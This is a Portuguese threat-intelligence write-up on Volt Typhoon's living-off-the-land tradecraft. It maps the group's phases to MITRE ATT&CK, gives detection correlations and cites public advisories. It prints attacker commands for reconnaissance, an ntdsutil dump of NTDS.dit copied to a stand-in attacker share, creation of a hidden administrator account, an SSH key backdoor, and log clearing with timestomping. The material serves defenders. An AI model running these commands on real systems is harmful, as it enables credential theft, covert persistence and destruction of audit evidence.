proc-volt-typhoon-lotl-persistence

# PROC - Volt Typhoon: Living-Off-The-Land em Infraestrutura Critica ## Visão Geral O [[g1017-volt-typhoon|Volt Typhoon]] (também denominado BRONZE SILHOUETTE, Vanguard Panda) e um grupo APT vinculado ao estado chines, operando com um mandato explicito de pre-posicionamento em infraestrutura critica ocidental. Diferente de APTs focados em espionagem imediata, o Volt Typhoon opera com horizonte temporal de longo prazo: o objetivo e estabelecer acesso persistente e silencioso que possa ser ativado em momentos de escalada geopolitica para perturbar comúnicacoes militares, energia e agua em caso de conflito no Pacifico. A caracteristica mais distintiva do grupo e o uso quase exclusivo de **Living-off-the-Land (LotL)**: o Volt Typhoon evita implantar malware customizado, utilizando apenas binarios, ferramentas e protocolos nativos do sistema operacional e da rede alvo. Essa escolha torna a detecao extraordinariamente dificil - cada acao individual parece legitima quando analisada isoladamente. O grupo usa `netsh`, `wmic`, `ntdsutil`, `certutil` e comandos de shell para toda a sua operação, sem binarios externos. O grupo foi exposto públicamente em um advisory conjunto NSA/CISA/FBI em maio de 2023, revelando que havia comprometido redes de infraestrutura critica nos EUA, Guam (base militar), e aliados. A descoberta causou alarme significativo por evidênciar acesso persistente de anos em setores como energia eletrica, agua, telecomúnicacoes e transporte. ## Attack Flow ```mermaid graph TB A["🌐 Exploração de Edge Devices Fortinet/SOHO Routers/VPN"] --> B["🔑 Roubo de Credenciais NTDS.dit via ntdsutil"] B --> C["🕵️ Reconhecimento LotL netsh / wmic / ipconfig"] C --> D["🔀 Pivoting via SOHO Routers Botnets de roteadores comprometidos"] D --> E["🏠 Persistência Legitima Contas locais + SSH keys"] E --> F["📡 Acesso Longo Prazo Pre-posicionamento silencioso"] F --> G["🔇 Cobertura de Rastros Delecao de logs + timestamps"] ``` ## Passo a Passo ### Fase 1 - Acesso via Dispositivos de Borda Vulneraveis O Volt Typhoon inicia comprometimentos via dispositivos de borda de rede: roteadores SOHO (small office/home office), appliances VPN e firewalls de pequenos fornecedores ([[t1190-exploit-public-facing-application|T1190]]). CVEs historicamente explorados pelo grupo incluem: - CVE-2022-42475 (Fortinet FortiOS - heap overflow pre-auth) - CVE-2023-27997 (Fortinet FortiGaté SSL-VPN) - CVE-2021-40539 (ManageEngine ADSelfService Plus) - Dispositivos SOHO Cisco, Netgear, ASUS com firmware desatualizado Após comprometer o dispositivo de borda, o grupo estabelece acesso ao segmento interno da rede sem implantar qualquer ferramenta adicional no endpoint - apenas roteia trafego através do dispositivo comprometido. ### Fase 2 - Reconhecimento Usando Apenas Ferramentas Nativas Todo o reconhecimento e realizado exclusivamente com ferramentas built-in do Windows e Linux ([[t1036-masquerading|T1036]]): ```batch REM Mapeamento de rede com ferramentas nativas netsh interface show interface ipconfig /all route print arp -a REM Enumeracao de hosts ativos for /L %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i REM Descoberta de servicos expostos netstat -ano tasklist /v REM Informacoes do dominio AD nltest /domain_trusts net group "Domain Admins" /domain net user /domain ``` A ausência de ferramentas externas como nmap, BloodHound ou similares e intencional: cada comando executado tem equivalente em logs de auditoria Windows com aparencia completamente legitima. ### Fase 3 - Extração de Credenciais via ntdsutil Para obtencao de credenciais de dominio, o Volt Typhoon usa o `ntdsutil.exe` - ferramenta oficial da Microsoft para manutenção do Active Directory ([[t1003-003-ntds\|T1003.003]]): ```batch REM Criar snapshot do NTDS.dit sem alertar EDR ntdsutil "ac i ntds" "ifm" "creaté full C:\Temp\ntds_backup" q q REM Copiar arquivos necessários para extrair hashes copy C:\Temp\ntds_backup\Active Directory\ntds.dit \\atacante\share copy C:\Windows\System32\config\SYSTEM \\atacante\share ``` Esse comando e identico ao usado por administradores para backup do AD - sem context adicional, e indistinguivel de operação legitima. O grupo processa os hashes offline, em infraestrutura propria. ### Fase 4 - Persistência via Contas Legitimas Em vez de criar malware ou backdoors que possam ser detectados, o Volt Typhoon cria ou ativa contas de servico legitimas com senhas controladas pelo grupo ([[t1078-valid-accounts|T1078]]): ```batch REM Criar conta local discreta net user SvcBackupAgent [senha_complexa] /add net localgroup Administrators SvcBackupAgent /add REM Habilitar conta de administrador built-in (frequentemente desativada) net user Administrator [nova_senha] /active:yes REM Adicionar chave SSH para acesso em servidores Linux echo "[chave_publica_RSA]" >> /home/svcadmin/.ssh/authorized_keys ``` A persistência via contas legitimas e superior a backdoors: sobrevive a reformatacoes parciais, reinicializacoes e até a reinstalacao do sistema operacional se a conta for no AD. ### Fase 5 - Pivoting via Botnet de Roteadores SOHO O aspecto mais sofisticado do Volt Typhoon e o uso de uma rede de roteadores SOHO comprometidos como infraestrutura de proxy ([[t1090-003-multi-hop-proxy|T1090.003]]). O trafego do grupo passa por 3-5 roteadores comprometidos antes de atingir o alvo, com IPs de origem em ISPs residenciais nos proprios paises alvo: ``` Volt Typhoon China → Roteador SOHO EUA (comprometido) → Roteador SOHO Australia (comprometido) → Roteador SOHO Canada (comprometido) → Alvo: Infraestrutura Critica EUA ``` Isso torna a atribuicao extremamente dificil: os logs mostram conexoes de IPs residenciais locais, não de infraestrutura chinesa. ### Fase 6 - Cobertura de Rastros Após cada sessao, o grupo remove evidências usando ferramentas nativas ([[t1070-indicator-removal|T1070]]): ```batch REM Limpar logs de eventos Windows wevtutil cl System wevtutil cl Security wevtutil cl Application REM Remover historico de comandos PowerShell Remove-Item (Get-PSReadlineOption).HistorySavePath REM Alterar timestamps de arquivos (timestomping) powershell (Get-Item arquivo.txt).LastWriteTime = '2022-01-01 00:00:00' ``` ## TTPs Mapeados | Fase | Técnica MITRE | Descrição | |------|--------------|-----------| | Acesso Inicial | [[t1190-exploit-public-facing-application\|T1190]] | Exploração de edge devices VPN/Firewall | | Acesso Inicial | [[t1078-valid-accounts\|T1078]] | Credenciais de contas legitimas | | Execução | [[t1059-003-windows-command-shell\|T1059.003]] | CMD/PowerShell nativos para toda operação | | Persistência | [[t1078-003-local-accounts\|T1078.003]] | Criação de contas locais legitimas | | Evasão | [[t1036-masquerading\|T1036]] | Atividade identica a operações legitimas de TI | | Evasão | [[t1070-indicator-removal\|T1070]] | Delecao sistematica de logs de eventos | | Evasão | [[t1070-006-timestomp\|T1070.006]] | Alteração de timestamps de arquivos | | Descoberta | [[t1018-remote-system-discovery\|T1018]] | Enumeracao de rede com ferramentas nativas | | Credenciais | [[t1003-003-ntds\|T1003.003]] | Dump de NTDS.dit via ntdsutil | | Pivoting | [[t1090-003-multi-hop-proxy\|T1090.003]] | Cadeia de roteadores SOHO comprometidos | | Persistência | [[t1098-004-ssh-authorized-keys\|T1098.004]] | SSH authorized_keys em servidores Linux | ## Detecção O Volt Typhoon e excepcionalmente dificil de detectar por design. Detecção eficaz requer correlação de eventos, não detecção de eventos individuais. **Abordagem recomendada - detecção por comportamento anômalo:** | Indicador Correlacionado | Severidade | Técnica | |--------------------------|-----------|---------| | `ntdsutil` executado em horario nao-comercial | Alta | EDR + SIEM time-based | | `wevtutil cl` executado após comandos de reconhecimento | Critica | SIEM correlação sequencial | | Conta de servico com login interativo (nao-esperado) | Alta | AD audit log (Event 4624 tipo 2) | | Multiplos `netsh`/`arp -a` em sequencia em servidor | Media | EDR baseline + anomalia | | Conexão SSH de IP residencial para servidor critico | Alta | Firewall + geo-anomalia | | Volume de dados transferido via conta admin incomum | Alta | DLP / NDR | **Linha de base critica:** Documentar todos os usos legitimos de `ntdsutil`, `wevtutil`, contas de servico e acessos SSH. Qualquer desvio e um sinal. ## Contexto Brasil/LATAM Embora o mandato primario do Volt Typhoon sejá pre-posicionamento em infraestrutura critica ocidental ligada a segurança nacional dos EUA (bases militares, comúnicacoes militares, energia), a métodologia LotL do grupo representa uma tendencia crescente entre APTs estatais que afeta diretamente o Brasil. O Brasil opera infraestrutura critica com niveis de proteção variaveis: o setor eletrico (ANEEL/ONS) tem protocolos de segurança mais maduros, mas municipios menores e concessionarias regionais frequentemente operam com infraestrutura legada e sem monitoramento adequado. Roteadores SOHO de fabricantes como TP-Link e D-Link - presentes em massa em PMEs e orgaos públicos brasileiros - sao particularmente vulneraveis e foram identificados em botnets LOTL. A métodologia do Volt Typhoon serve como modelo para outros grupos APTs estatais que operam na América Latina (iranianoes, russos, norte-coreanos) e que adotaram progressivamente técnicas LOTL para evasão. Organizacoes brasileiras de infraestrutura critica devem implementar monitoramento de comportamento de contas privilegiadas e auditoria de uso de ferramentas nativas como controles prioritarios. ## Referências - [CISA/NSA/FBI Advisory — Volt Typhoon LOTL Techniques 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a) - [Microsoft MSTIC — Volt Typhoon targets US critical infrastructure](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) - [Secureworks — BRONZE SILHOUETTE Profile](https://www.secureworks.com/research/bronze-silhouette) - [FBI Director Wray Congressional Testimony on Volt Typhoon](https://www.fbi.gov/news/testimony/worldwide-threats-to-the-homeland-2024) - [CISA — Secure by Design: Mitigating LOTL Threats](https://www.cisa.gov/resources-tools/resources/secure-by-design)